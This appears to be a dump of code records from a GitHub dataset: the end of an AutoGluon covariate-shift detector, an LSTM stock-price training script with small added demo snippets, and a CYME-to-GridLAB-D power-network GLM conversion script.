sample?\n        if 'label' in args:\n            label = args['label']\n        else:\n            label = None\n        tst = C2STShiftDetector(classifier_class=self.classifier_class,\n                                label=label,\n                                compute_fi=self.compute_fi,\n                                classifier_kwargs=self.classifier_kwargs)\n        assert 'train_data' in args, 'train_data required as arg'\n        assert 'test_data' in args, 'test_data required as arg'\n        tst.fit(X=args['train_data'],\n                X_test=args['test_data'],\n                verbosity=0)\n        state.xshift_results = tst.results()\n","repo_name":"jsharpna/autogluon_eda","sub_path":"eda/src/autogluon/eda/analysis/shift.py","file_name":"shift.py","file_ext":"py","file_size_in_byte":13798,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"65"}
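# --- Added mini-demo (mine) of the permutation idea behind
# _pvalue_half_permutation above: shuffle the predictions, recompute the
# metric, and report the fraction of permuted statistics that meet or beat
# the observed one. Plain accuracy stands in for the configured metric.
import numpy as np

rng = np.random.default_rng(0)
y_true = rng.integers(0, 2, 200)
y_hat = y_true.copy()
y_hat[:20] = 1 - y_hat[:20]            # a strong classifier: 10% errors
observed = (y_true == y_hat).mean()
perm = [(y_true == rng.permutation(y_hat)).mean() for _ in range(1000)]
pval = (observed <= np.array([observed] + perm)).mean()
print(f"accuracy={observed:.2f}, permutation p-value ~ {pval:.3f}")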
+{"seq_id":"70813766606","text":"# Train a model for each symbol by using best features and best offset.\n# For each symbol we want to predict the close value after 5,10,15,20 days\n\n# Import libraries\nimport pandas as pd\nimport numpy as np\nimport tensorflow as tf\nimport matplotlib.pyplot as plt\nimport pickle\n\n# Select symbol to predict\nsymbol = 'TSLA_close'\nmax_features_number = 60  # limit the max number of features to use; we can download a limited amount of\n# data because of API limits\ntrain_split = 0.8\ndays_to_predict = [20]\nwindow_size = 3\nmaximum_mae_admitted = 48\npatience = 300  # patience of the EarlyStopping callback\n\n# Load best features and best offset list\nwith open('features_selector_data/features_selector.p', 'rb') as fp:\n    selected_features = pickle.load(fp)\n\nfeatures = selected_features[symbol]['features']\noffset = selected_features[symbol]['offset']\n\n# Load data\nfull_data = pd.read_csv('clean_data/full_data.csv', index_col=False)\n\n# If needed, select only the first max_features_number features that are the most correlated ones\nif len(selected_features[symbol]['features']) > max_features_number:\n    features = selected_features[symbol]['features'][:max_features_number]\n    offsets = selected_features[symbol]['offset'][:max_features_number]\nelse:\n    features = selected_features[symbol]['features']\n    offsets = selected_features[symbol]['offset']\n\n# Create matrices for x and y where y[time] and x[time,feature]\ny = np.flip(np.array(full_data[symbol]))  # y[time]\nx = np.array(full_data[features])\nfor i in range(x.shape[1]):  # x[time,feature]\n    x[:, i] = np.flip(x[:, i])\n\n# Apply offset to each feature in x and reshape matrix\nseries_length = [(x.shape[0] - offsets[i] - sum(np.isnan(x[:, i])))\n                 for i in range(len(features))\n                 ]\nx_length = min(series_length)\noffset_y = y[-x_length:]\noffset_x = np.empty((x_length, len(features)))\n\nfor i in range(len(features)):\n    offset_x[:, i] = x[:, i][-offsets[i] - x_length: -offsets[i]]\n\nmax_predicted_period = max(days_to_predict)\nwindow_x = [None] * (x_length - window_size)\nwindow_y = [None] * (x_length - window_size)\n\nfor i in range(x_length - window_size):\n    current_window_x = offset_x[i + 1:i + window_size + 1, :]\n    current_window_y = offset_y[i + window_size - max_predicted_period + np.array(days_to_predict)]\n    window_x[i] = current_window_x\n    window_y[i] = current_window_y\n\nwindow_x = np.array(window_x)\nwindow_y = np.array(window_y)\n\n# Training-Validation split: we use the oldest values for training and the newest values for validation\nindex_split = int(train_split * window_x.shape[0])\nx_train = window_x[:index_split, :, :]\nx_valid = window_x[index_split:, :, :]\ny_train = window_y[:index_split, :]\ny_valid = window_y[index_split:, :]\n\n# Model training\noptimizer = tf.keras.optimizers.Adam(learning_rate=1e-5)\ncheckpoint_cb = tf.keras.callbacks.ModelCheckpoint('models/' + symbol + '.h5', save_best_only=True)\nearly_stopping_cb = tf.keras.callbacks.EarlyStopping(patience=patience, restore_best_weights=True)\n\n# since model performances are very linked to selection of initial values, the model is trained\n# until its validation loss is sufficiently low\ngo_on = True\n\nwhile go_on:\n    model = tf.keras.models.Sequential([\n        tf.keras.layers.Conv1D(filters=32, kernel_size=5,\n                               strides=1, padding=\"causal\",\n                               activation=\"relu\",\n                               input_shape=[window_size, len(features)]),\n        tf.keras.layers.LSTM(64, return_sequences=True),\n        tf.keras.layers.LSTM(64),\n        tf.keras.layers.Dense(64, activation=\"relu\"),\n        tf.keras.layers.Dropout(0.1),\n        tf.keras.layers.Dense(10, activation=\"relu\"),\n        tf.keras.layers.Dense(len(days_to_predict)),\n        tf.keras.layers.Lambda(lambda x: x * 600)  # speed up the convergence to optimum\n    ])\n\n    model.compile(loss=tf.keras.losses.Huber(),\n                  optimizer=optimizer,\n                  metrics=[\"mae\"])\n\n    history = model.fit(\n        x_train, y_train,\n        validation_data=(x_valid, y_valid),\n        epochs=5000,\n        callbacks=[checkpoint_cb, early_stopping_cb]\n    )\n\n    if history.history['val_mae'][-patience] < maximum_mae_admitted:  # with early stopping, the best epoch sits patience entries before the end\n        go_on = False\n\n\n# Plot training and validation loss\nloss = history.history['loss']\nval_loss = history.history['val_loss']\nepochs = range(len(loss))  # get number of epochs\n\nplt.plot(epochs, loss, 'r', label='Training Loss')\nplt.plot(epochs, val_loss, 'b', label='Validation Loss')\nplt.vlines(x=len(loss) - patience, ymin=0, ymax=600,  # add early stopping vertical line\n           colors='green', ls=':', lw=2,\n           label='Early stopping')\nplt.title('Training and Validation Loss')\nplt.xlabel(\"Epochs\")\nplt.ylabel(\"Loss\")\n\nplt.legend()\nplt.figure()\n\n# Save model info\nmodel_info = {\n    'loss': history.history['loss'],\n    'val_loss': history.history['val_loss'],\n    'predicted_days': days_to_predict,\n    'window_size': window_size,\n    'max_features_number': max_features_number\n}\n\nwith open('models/' + symbol + '_info.p', 'wb') as fp:\n    pickle.dump(model_info, fp)\n","repo_name":"danieled3/Autotrading","sub_path":"training.py","file_name":"training.py","file_ext":"py","file_size_in_byte":5145,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"}
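# --- Added toy check (mine) of the sliding-window construction above: each
# window_x[i] holds window_size consecutive feature rows and each window_y[i]
# holds one target per entry of days_to_predict.
import numpy as np

series = np.arange(10, dtype=float)      # stand-in for offset_y
feats = series.reshape(-1, 1)            # stand-in for offset_x
w, horizon = 3, [2]
X = np.array([feats[i + 1:i + w + 1] for i in range(len(series) - w)])
y = np.array([series[i + w - max(horizon) + np.array(horizon)]
              for i in range(len(series) - w)])
assert X.shape == (7, 3, 1) and y.shape == (7, 1)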
 if history.history['val_mae'][-patience] < maximum_mae_admitted: # with EarlyStopping, index -patience is approximately the best (lowest validation loss) epoch\n go_on = False\n\n\n# Plot training and validation loss\nloss = history.history['loss']\nval_loss = history.history['val_loss']\nepochs = range(len(loss)) # get number of epochs\n\nplt.plot(epochs, loss, 'r', label='Training Loss')\nplt.plot(epochs, val_loss, 'b', label='Validation Loss')\nplt.vlines(x=len(loss) - patience, ymin=0, ymax=600, # add early stopping vertical line\n colors='green', ls=':', lw=2,\n label='Early stopping')\nplt.title('Training and Validation Loss')\nplt.xlabel(\"Epochs\")\nplt.ylabel(\"Loss\")\n\nplt.legend()\nplt.figure()\n\n# Save model info\nmodel_info = {\n 'loss': history.history['loss'],\n 'val_loss': history.history['val_loss'],\n 'predicted_days': days_to_predict,\n 'window_size': window_size,\n 'max_features_number': max_features_number\n}\n\nwith open('models/' + symbol + '_info.p', 'wb') as fp:\n pickle.dump(model_info, fp)\n","repo_name":"danieled3/Autotrading","sub_path":"training.py","file_name":"training.py","file_ext":"py","file_size_in_byte":5145,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"}
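# Editor's note: a minimal sketch of the sliding-window framing used by the training
# script above, assuming numpy only. It shows how windows of `window_size` consecutive
# rows are paired with the target value `horizon` days ahead; the function and variable
# names here are illustrative, not the script's.
import numpy as np

def make_windows(x, y, window_size=3, horizon=20):
    """x: (T, n_features) aligned features; y: (T,) target series.
    Returns (N, window_size, n_features) windows and the matching (N,) labels."""
    xs, ys = [], []
    for i in range(window_size, len(y) - horizon + 1):
        xs.append(x[i - window_size:i, :])  # the window_size rows before time i
        ys.append(y[i + horizon - 1])       # the target value `horizon` steps later
    return np.array(xs), np.array(ys)

# 100 days of 4 features yields 78 windows for a 20-day horizon
demo_x, demo_y = np.random.rand(100, 4), np.random.rand(100)
wx, wy = make_windows(demo_x, demo_y)
assert wx.shape == (78, 3, 4) and wy.shape == (78,)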
+{"seq_id":"35111544089","text":"#!/usr/bin/python3\n\"\"\"OpenFIDO write_glm post-processor script\n\nSyntax:\n\thost% python3 -m write_glm.py -i|--input INPUTDIR -o|--output OUTPUTDIR -d|--data DATADIR [-c|--config [CONFIGCSV]] [-h|--help] [-t|--cyme-tables]\n\nConcept of Operation\n--------------------\n\nFiles are processed in the local folder, which must contain the required CSV files listed in the `cyme_tables_required` \nglobal variable. \n\nOperation of this script is controlled by the file `{INPUTDIR}/config.csv`:\n\n\tTABLES,glm\n\tEXTRACT,non-empty\n\tPOSTPROC,write_glm.py\n\tGLM_NOMINAL_VOLTAGE,2.40178 kV\n\tGLM_NETWORK_PREFIX,IEEE13_\n\tGLM_INCLUDE,config.glm\n\tGLM_MODIFY,modify.csv\n\tGLM_DEFINE,SOLUTIONDUMP=yes\n\tGLM_ASSUMPTIONS,include\n\nAll output is written to the parent folder. Currently the following files are generated, depending on the\nsettings in the control file:\n\n - `{OUTPUTDIR}/{MDBNAME}_{NETWORKID}.glm`\n - `{OUTPUTDIR}/{MDBNAME}_{NETWORKID}_assumptions.glm`\n - `{OUTPUTDIR}/{MDBNAME}_{NETWORKID}_assumptions.csv`\n\n\"\"\"\n\napp_version = 0\n\nimport sys, os\nimport getopt\nimport subprocess\nimport glob\nimport datetime as dt\nimport pandas as pd\nimport networkx as nx\nimport matplotlib.pyplot as plt\nfrom math import sqrt\nimport re\nimport hashlib\nimport csv\nimport pprint\npp = pprint.PrettyPrinter(indent=4,compact=True)\nimport traceback\nfrom copy import copy\n\n#\n# Required tables to operate properly\n#\ncyme_tables_required = [\n\t\"CYMNETWORK\",\"CYMHEADNODE\",\"CYMNODE\",\"CYMSECTION\",\"CYMSECTIONDEVICE\",\n\t\"CYMOVERHEADBYPHASE\",\"CYMOVERHEADLINEUNBALANCED\",\"CYMEQCONDUCTOR\",\n\t\"CYMEQGEOMETRICALARRANGEMENT\",\"CYMEQOVERHEADLINEUNBALANCED\",\n\t\"CYMSWITCH\",\"CYMCUSTOMERLOAD\",\"CYMSHUNTCAPACITOR\",\n\t\"CYMTRANSFORMER\",\"CYMEQTRANSFORMER\",\"CYMREGULATOR\",\"CYMEQREGULATOR\"\n\t]\n\n#\n# Argument parsing\n#\nconfig = {\n\t\"input\" : \"/\",\n\t\"output\" : \"/\",\n\t\"from\" : {},\n\t\"type\" : {},\n\t\"options\" : {\n\t\t\"config\" : \"specify config.csv\",\n\t\t\"cyme-tables\" : \"get required CYME tables\",\n\t},\n}\ninput_folder = None\noutput_folder = None\ndata_folder = None\nconfig_file = None\nopts, args = getopt.getopt(sys.argv[1:],\"hc:i:o:d:t\",[\"help\",\"config=\",\"input=\",\"output=\",\"data=\",\"cyme-tables\"])\n\ndef help(exit_code=None,details=False):\n\tprint(\"Syntax: python3 -m write_glm.py -i|--input DIR -o|--output DIR -d|--data DIR [-h|--help] [-t|--cyme-tables] [-c|--config CSV]\")\n\tif details:\n\t\tprint(globals()[__name__].__doc__)\n\tif type(exit_code) is int:\n\t\texit(exit_code)\n\nif not opts : \n\thelp(1)\n\nfor opt, arg in opts:\n\tif opt in (\"-h\",\"--help\"):\n\t\thelp(0,details=True)\n\telif opt in (\"-c\",\"--config\"):\n\t\tif arg:\n\t\t\tconfig_file = arg.strip()\n\t\telse:\n\t\t\tprint(config)\n\telif opt in (\"-t\",\"--cyme-tables\"):\n\t\tprint(\" \".join(cyme_tables_required))\n\t\tsys.exit(0)\n\telif opt in (\"-i\", \"--input\"):\n\t\tinput_folder = arg.strip()\n\telif opt in (\"-o\", \"--output\"):\n\t\toutput_folder = arg.strip()\n\telif opt in (\"-d\", \"--data\"):\n\t\tdata_folder = arg.strip()\n\telse:\n\t\traise Exception(f\"{opt}={arg} is not a valid option\") # error() cannot be used here because settings are not loaded yet\nif input_folder == None:\n\traise Exception(\"input_folder must be specified using '-i|--input DIR' option\")\nif output_folder == None:\n\traise Exception(\"output_folder must be specified using '-o|--output DIR' option\")\nif data_folder == None:\n\traise Exception(\"data_folder must be specified using '-d|--data DIR' option\")\nif config_file == None:\n\tconfig_file = f\"{input_folder}/config.csv\"\n\n#\n# Application information\n#\napp_command = os.path.abspath(sys.argv[0])\napp_workdir = os.getenv(\"PWD\")\napp_path = \"/\"+\"/\".join(app_command.split(\"/\")[0:-1])\n\n#\n# Git information\n#\n# TODO: change this to use gitpython module\n#\ndef command(cmd,lang=\"utf-8\"):\n\treturn subprocess.run(cmd.split(),stdout=subprocess.PIPE).stdout.decode(lang).strip()\nos.chdir(app_path)\ngit_project = command(\"git config --local remote.origin.url\")\ngit_commit = command(\"git rev-parse HEAD\")\ngit_branch = command(\"git rev-parse --abbrev-ref HEAD\")\nos.chdir(app_workdir)\n\n#\n# CYME model information\n#\ncyme_mdbname = data_folder.split(\"/\")[-1]\ndefault_cyme_extractor = \"50\"
= \"50\"\n\n#\n# Warning/error handling\n#\nwarning_count = 0\ndef warning(*args):\n\tglobal warning_count\n\twarning_count += 1\n\tif settings[\"GLM_WARNINGS\"] == \"stdout\":\n\t\tprint(f\"*** WARNING {warning_count} ***\")\n\t\tprint(\" \",\"\\n \".join(args))\n\telif settings[\"GLM_WARNINGS\"] == \"stderr\":\n\t\tprint(f\"*** WARNING {warning_count} ***\",file=sys.stderr)\n\t\tprint(\" \",\"\\n \".join(args),file=sys.stderr)\n\telse:\n\t\traise Exception(\"\\n\".join(args))\n\nerror_count = 0\ndef error(*args):\n\tglobal error_count\n\terror_count += 1\n\tif settings[\"GLM_ERRORS\"] == \"stdout\":\n\t\tprint(f\"*** ERROR {error_count} ***\")\n\t\tprint(\" \",\"\\n \".join(args))\n\telif settings[\"GLM_ERRORS\"] == \"stderr\":\n\t\tprint(f\"*** ERROR {error_count} ***\",file=sys.stderr)\n\t\tprint(\" \",\"\\n \".join(args),file=sys.stderr)\n\telse:\n\t\traise Exception(\"\\n\".join(args))\n\ndef format_exception(errmsg,ref=None,data=None):\n\ttb = str(traceback.format_exc().replace('\\n','\\n '))\n\tdd = str(pp.pformat(data).replace('\\n','\\n '))\n\treturn \"\\n \" + tb + \"'\" + ref + \"' =\\n \"+ dd\n\n#\n# Load user configuration\n#\nconfig = pd.DataFrame({\n\t\"GLM_NETWORK_PREFIX\" : [\"\"],\n\t\"GLM_NETWORK_MATCHES\" : [\".*\"],\n\t\"GLM_NOMINAL_VOLTAGE\" : [\"\"],\n\t\"GLM_INCLUDE\" : [\"\"],\n\t\"GLM_DEFINE\" : [\"\"],\n\t\"GLM_ERRORS\" : [\"exception\"],\n\t\"GLM_WARNINGS\" : [\"stdout\"],\n\t\"GLM_MODIFY\" : [\"\"],\n\t\"GLM_ASSUMPTIONS\" : [\"include\"]\n\t}).transpose().set_axis([\"value\"],axis=1,inplace=0)\nconfig.index.name = \"name\" \nsettings = pd.read_csv(config_file, dtype=str,\n\tnames=[\"name\",\"value\"],\n\tcomment = \"#\",\n\t).set_index(\"name\")\nfor name, values in settings.iterrows():\n\tif name in config.index:\n\t\tconfig[\"value\"][name] = values[0]\nsettings = config[\"value\"]\nprint(f\"Running write_glm.py:\")\nfor name, data in config.iterrows():\n\tprint(f\" {name} = {data['value']}\")\n\n#\n# Phase mapping\n#\ncyme_phase_name = {0:\"ABCN\", 1:\"A\", 2:\"B\", 3:\"C\", 4:\"AB\", 5:\"AC\", 6:\"BC\", 7:\"ABC\"} # CYME phase number -> phase names\nglm_phase_code = {\"A\":1, \"B\":2, \"C\":4, \"AB\":3, \"AC\":5, \"BC\":6, \"ABC\":7} # GLM phase name -> phase number\nglm_phase_name = {0:\"ABCN\", 1:\"A\",2:\"B\",3:\"AB\",4:\"C\",5:\"AC\",6:\"BC\",7:\"ABC\"} # GLM phase number -> phase name\n\n#\n# Device type mapping\n#\ncyme_devices = {\n\t1 : \"UndergroundLine\",\n\t2 : \"OverheadLine\",\n\t3 : \"OverheadByPhase\",\n\t4 : \"Regulator\",\n\t5 : \"Transformer\",\n\t6 : \"Not used\",\n\t7 : \"Not used\",\n\t8 : \"Breaker\",\n\t9 : \"LVCB\",\n\t10 : \"Recloser\",\n\t11 : \"Not used\",\n\t12 : \"Sectionalizer\",\n\t13 : \"Switch\",\n\t14 : \"Fuse\",\n\t15 : \"SeriesCapacitor\",\n\t16 : \"SeriesReactor\",\n\t17 : \"ShuntCapacitor\",\n\t18 : \"ShuntReactor\",\n\t19 : \"Not used\",\n\t20 : \"SpotLoad\",\n\t21 : \"DistributedLoad\",\n\t22 : \"Miscellaneous\",\n\t23 : \"OverheadLineUnbalanced\",\n\t24 : \"ArcFurnace\",\n\t25 : \"CTypeFilter\",\n\t26 : \"DoubleTunedFilter\",\n\t27 : \"HighPassFilter\",\n\t28 : \"IdealConverter\",\n\t29 : \"NonIdealConverter\",\n\t30 : \"ShuntFrequencySource\",\n\t31 : \"Not used\",\n\t32 : \"SingleTunedFilter\",\n\t33 : \"InductionMotor\",\n\t34 : \"SynchronousMotor\",\n\t35 : \"InductionGenerator\",\n\t36 : \"SynchronousGenerator\",\n\t37 : \"ElectronicConverterGenerator\",\n\t38 : \"TransformerByPhase\",\n\t39 : \"ThreeWindingTransformer\",\n\t40 : \"NetworkEquivalent\",\n\t41 : \"Wecs\",\n\t42 : \"GroundingTransformer\",\n\t43 : 
\"MicroTurbine\",\n\t44 : \"Sofc\",\n\t45 : \"Photovoltaic\",\n\t46 : \"SeriesFrequencySource\",\n\t47 : \"AutoTransformer\",\n\t48 : \"ThreeWindingAutoTransformer\",\n}\nglm_devices = {\n\t1 : \"underground_line\",\n\t2 : \"overhead_line\",\n\t3 : \"overhead_line\",\n\t4 : \"regulator\",\n\t5 : \"transformer\",\n\t# 8 : \"breaker\",\n\t# 10 : \"recloser\",\n\t# 12 : \"sectionalizer\",\n\t13 : \"switch\",\n\t# 14 : \"fuse\",\n\t17 : \"capacitor\",\n\t20 : \"load\",\n\t21 : \"load\",\n\t23 : \"overhead_line\",\n}\n\n#\n# CYME database access tools\n#\n\n# find records in a table (exact field match only)\ndef table_find(table,**kwargs):\n\tresult = table\n\tfor key,value in kwargs.items():\n\t\tresult = result[result[key]==value]\n\treturn result\n\n# get the value in a table using the index\ndef table_get(table,id,column=None):\n\tif column == None or column == \"*\":\n\t\treturn table.loc[id]\n\telse:\n\t\treturn table.loc[id][column]\n\n#\n# Load all the model tables (table names have an \"s\" appended)\n#\ncyme_table = {}\nfor filename in glob.iglob(f\"{data_folder}/*.csv\"):\n\tdata = pd.read_csv(filename, dtype=str)\n\tindex = data.columns[0]\n\tname = os.path.basename(filename)[0:-4].lower()\n\tcyme_table[name] = data.set_index(index)\nfor filename in cyme_tables_required:\n\tif filename[3:].lower() not in cyme_table.keys():\n\t\traise Exception(f\"required CYME table '{filename}' is not found in {input_folder}\")\n\n#\n# GLM file builder\n#\nclass GLM:\n\n\tprefix = {\n\t\t# known powerflow class in gridlabd\n\t\t\"billdump\" : \"BD_\",\n\t\t\"capacitor\" : \"CA_\",\n\t\t\"currdump\" : \"CD_\",\n\t\t\"emissions\" : \"EM_\",\n\t\t\"fault_check\" : \"FC_\",\n\t\t\"frequency_gen\" : \"FG_\",\n\t\t\"fuse\" : \"FS_\",\n\t\t\"impedance_dump\" : \"ID_\",\n\t\t\"line\" : \"LN_\",\n\t\t\"line_configuration\" : \"LC_\",\n\t\t\"line_sensor\" : \"LS_\",\n\t\t\"line_spacing\" : \"LG_\",\n\t\t\"link\" : \"LK_\",\n\t\t\"load\" : \"LD_\",\n\t\t\"load_tracker\" : \"LT_\",\n\t\t\"meter\" : \"ME_\",\n\t\t\"motor\" : \"MO_\",\n\t\t\"node\" : \"ND_\",\n\t\t\"overhead_line\" : \"OL\",\n\t\t\"overhead_line_conductor\" : \"OC_\",\n\t\t\"pole\" : \"PO_\",\n\t\t\"pole_configuration\" : \"PC_\",\n\t\t\"power_metrics\" : \"PM_\",\n\t\t\"powerflow_library\" : \"PL_\",\n\t\t\"powerflow_object\" : \"PO_\",\n\t\t\"pqload\" : \"PQ_\",\n\t\t\"recloser\" : \"RE_\",\n\t\t\"regulator\" : \"RG_\",\n\t\t\"regulator_configuration\" : \"RC_\",\n\t\t\"restoration\" : \"RS_\",\n\t\t\"sectionalizer\" : \"SE_\",\n\t\t\"series_reactor\" : \"SR_\",\n\t\t\"substation\" : \"SS_\",\n\t\t\"switch\" : \"SW_\",\n\t\t\"switch_coordinator\" : \"SC_\",\n\t\t\"transformer\" : \"TF_\",\n\t\t\"transformer_configuration\" : \"TC_\",\n\t\t\"triplex_line\" : \"XL_\",\n\t\t\"triplex_line_conductor\" : \"XC_\",\n\t\t\"triplex_line_configuration\" : \"XG_\",\n\t\t\"triplex_load\" : \"XD_\",\n\t\t\"triplex_meter\" : \"XM_\",\n\t\t\"triplex_node\" : \"XN_\",\n\t\t\"underground_line\" : \"UL_\",\n\t\t\"underground_line_conductor\" : \"UC_\",\n\t\t\"vfd\" : \"VF_\",\n\t\t\"volt_var_control\" : \"VV_\",\n\t\t\"voltdump\" : \"VD_\",\n\t}\n\n\tdef __init__(self,file,mode=\"w\"):\n\n\t\tself.filename = file\n\t\tself.fh = open(file,mode)\n\t\tself.objects = {}\n\t\tself.assumptions = []\n\t\tself.refcount = {}\n\n\tdef __del__(self):\n\t\tif self.objects:\n\t\t\tself.error(\"glm object was deleted before objects were output\")\n\n\tdef name(self,name,oclass=None):\n\t\tif type(name) is list: # composite name\n\t\t\tname = 
\"_\".join(name).replace(\".\",\"\").replace(\":\",\"\")[0:63] # disallow special name characters\n\t\tif oclass: # name prefix based on class\n\t\t\tif not oclass in self.prefix.keys(): # name prefix not found\n\t\t\t\tprefix = f\"Z{len(self.prefix.keys())}_\"\n\t\t\t\tself.prefix[oclass] = prefix\n\t\t\t\twarning(f\"{cyme_mdbname}@{network_id}: class '{oclass}' is not a known gridlabd powerflow class, using prefix '{prefix}' for names\")\n\t\t\telse:\n\t\t\t\tprefix = self.prefix[oclass]\n\t\t\tname = prefix + name\n\t\telif \"0\" <= name[0] <= \"9\": # fix names that start with digits\n\t\t\tname = \"_\" + name\n\t\treturn name.replace(\" \",\"_\") # remove white spaces from names\n\n\tdef write(self,line):\n\t\tprint(line,file=self.fh)\n\n\tdef blank(self):\n\t\tself.write(\"\")\n\n\tdef print(self,message):\n\t\tself.write(f\"#print {message}\")\n\n\tdef warning(self,message):\n\t\tself.write(f\"#warning {message}\")\n\n\tdef error(self,message):\n\t\tself.write(f\"#error {message}\")\n\n\tdef comment(self,*lines):\n\t\tfor line in lines:\n\t\t\tself.write(f\"// {line}\")\n\n\tdef set(self,name,value):\n\t\tself.write(f\"#set {name}={value}\")\n\n\tdef define(self,name,value):\n\t\tself.write(f\"#define {name}={value}\")\n\n\tdef include(self,name,brackets=\"\\\"\\\"\"):\n\t\tself.write(f\"#include {brackets[0]}{name}{brackets[1]}\")\n\n\tdef module(self, name, parameters = {}):\n\t\tif not parameters:\n\t\t\tself.write(f\"module {name};\")\n\t\telse:\n\t\t\tself.write(f\"module {name}\")\n\t\t\tself.write(\"{\")\n\t\t\tfor tag, value in parameters.items():\n\t\t\t\t\tif type(value) is str:\n\t\t\t\t\t\tself.write(f\"\\t{tag} \\\"{value}\\\";\")\n\t\t\t\t\telse:\n\t\t\t\t\t\tself.write(f\"\\t{tag} {value};\")\n\t\t\tself.write(\"}\")\n\n\tdef ifdef(self, name, call):\n\t\tglm.write(f\"#ifdef {name}\")\n\t\tcall()\n\t\tglm.write(\"#endif\")\n\n\tdef ifndef(self, name, call):\n\t\tglm.write(f\"#ifndef {name}\")\n\t\tcall()\n\t\tglm.write(\"#endif\")\n\n\tdef ifexist(self, name, call):\n\t\tglm.write(f\"#ifexist {name}\")\n\t\tcall()\n\t\tglm.write(\"#endif\")\n\n\tdef object(self, oclass, name, parameters,overwrite=True):\n\t\tif name not in self.objects.keys():\n\t\t\tobj = {\"name\" : name}\n\t\t\tself.objects[name] = obj\n\t\telse:\n\t\t\tobj = self.objects[name]\n\t\tfor key, value in parameters.items():\n\t\t\tif not overwrite and key in obj.keys() and obj[key] != value:\n\t\t\t\traise Exception(f\"object property '{key}={obj[key]}' merge conflicts with '{key}={value}'\")\n\t\t\tif value == None and key in obj.keys():\n\t\t\t\tdel obj[key]\n\t\t\telse:\n\t\t\t\tobj[key] = value\n\t\tobj[\"class\"] = oclass\n\t\tif name in self.refcount.keys():\n\t\t\tself.refcount[name] += 1\n\t\telse:\n\t\t\tself.refcount[name] = 1\n\t\treturn obj\n\n\tdef delete(self,name):\n\t\tif self.refcount[name] == 1:\n\t\t\tdel self.objects[name]\n\t\telif self.refcount[name] > 1:\n\t\t\tself.refcount[name] -= 1\n\n\n\tdef modify(self,object,property,value,comment=\"\"):\n\t\tif comment:\n\t\t\tcomment = \" // \" + str(comment)\n\t\telif not type(comment) is str:\n\t\t\tcomment = \"\"\n\t\tif type(value) is str:\n\t\t\tself.write(f\"modify {object}.{property} \\\"{value}\\\";{comment}\")\n\t\telse:\n\t\t\tself.write(f\"modify {object}.{property} {value};{comment}\")\n\n\tdef assume(self,objname,propname,value,remark=\"\"):\n\t\tself.assumptions.append([objname,propname,value,remark])\n\n\tdef close(self):\n\t\t\n\t\t# objects\n\t\tif self.objects:\n\t\t\tfor name, parameters in 
\n\tdef close(self):\n\n\t\t# objects\n\t\tif self.objects:\n\t\t\tfor name, parameters in self.objects.items():\n\t\t\t\tself.write(f\"object {parameters['class']}\")\n\t\t\t\tself.write(\"{\")\n\t\t\t\tfor tag, value in parameters.items():\n\t\t\t\t\tif tag != \"class\":\n\t\t\t\t\t\tif type(value) is str:\n\t\t\t\t\t\t\tself.write(f\"\\t{tag} \\\"{value}\\\";\")\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tself.write(f\"\\t{tag} {value};\")\n\t\t\t\tself.write(\"}\")\n\t\t\tself.objects = {}\n\n\t\t# assumptions\n\t\tif self.assumptions:\n\t\t\tif settings[\"GLM_ASSUMPTIONS\"] == \"save\":\n\t\t\t\tfilename = f\"{settings['GLM_NETWORK_PREFIX']}{cyme_mdbname}_{network_id}_assumptions.glm\"\n\t\t\t\twith open(f\"{output_folder}/{filename}\",\"w\") as fh:\n\t\t\t\t\tprint(f\"// Assumptions for GLM conversion from database {cyme_mdbname} network {network_id}\",file=fh)\n\t\t\t\t\tfor row in self.assumptions:\n\t\t\t\t\t\tprint(f\"modify {row[0]}.{row[1]} \\\"{row[2]}\\\"; // {row[3]}\",file=fh)\n\t\t\telif settings[\"GLM_ASSUMPTIONS\"] == \"include\":\n\t\t\t\tself.blank()\n\t\t\t\tself.comment(\"\",\"Assumptions\",\"\")\n\t\t\t\tfor row in self.assumptions:\n\t\t\t\t\tself.modify(row[0],row[1],row[2],row[3])\n\t\t\telif settings[\"GLM_ASSUMPTIONS\"] == \"warn\":\n\t\t\t\tfilename = f\"{output_folder}/{cyme_mdbname}_{network_id}_assumptions.csv\"\n\t\t\t\twarning(f\"{cyme_mdbname}@{network_id}: {len(self.assumptions)} assumptions made, see '{filename}' for details\")\n\t\t\t\tpd.DataFrame(self.assumptions).to_csv(filename,header=[\"object_name\",\"property_name\",\"value\",\"remark\"],index=False)\n\t\t\telif settings[\"GLM_ASSUMPTIONS\"] != \"ignore\":\n\t\t\t\twarning(f\"GLM_ASSUMPTIONS={settings['GLM_ASSUMPTIONS']} is not valid (must be one of 'save','ignore','warn','include')\")\n\n\t\t# modifications\n\t\tfor modify in settings[\"GLM_MODIFY\"].split():\n\t\t\tself.blank()\n\t\t\tself.comment(\"\",f\"Modifications from '{modify}'\",\"\")\n\t\t\twith open(f\"{input_folder}/{modify}\",\"r\") as fh:\n\t\t\t\treader = csv.reader(fh)\n\t\t\t\tfor row in reader:\n\t\t\t\t\tif not row: # skip blank rows\n\t\t\t\t\t\tcontinue\n\t\t\t\t\telif len(row) < 3:\n\t\t\t\t\t\twarning(f\"{modify}: row '{','.join(list(row))}' is missing one or more required fields\")\n\t\t\t\t\telif len(row) > 3:\n\t\t\t\t\t\twarning(f\"{modify}: row '{','.join(list(row))}' has extra fields that will be ignored\")\n\t\t\t\t\t\tself.modify(*row[0:3])\n\t\t\t\t\telse:\n\t\t\t\t\t\tself.modify(*row)\n\n\t# general glm model add function\n\tdef add(self,oclass,device_id,data,version,**kwargs):\n\t\ttry:\n\t\t\tcall = getattr(self,\"add_\"+oclass)\n\t\t\treturn call(device_id,data,version=version,**kwargs)\n\t\texcept Exception as errmsg:\n\t\t\twarning(f\"{cyme_mdbname}@{network_id}: unable to add gridlabd class '{oclass}' using CYME device '{device_id}': {errmsg} {format_exception(errmsg,device_id,data.to_dict())}\")\n\n\t# add a link to glm file\n\tdef add_link(self,section_id,section,version,**kwargs):\n\t\tphase = int(section[\"Phase\"])\n\t\tfrom_node_id = section[\"FromNodeId\"]\n\t\tto_node_id = section[\"ToNodeId\"]\n\t\tdevice_dict = {}\n\t\tfor device_id, device in table_find(cyme_table[\"sectiondevice\"],SectionId=section_id).iterrows():\n\t\t\tdevice_type = int(device[\"DeviceType\"])\n\t\t\tif device_type in glm_devices.keys():\n\t\t\t\tdevice_name = self.name(device_id,\"link\")\n\t\t\t\tdevice_dict[device_id] = self.object(\"link\", device_name , 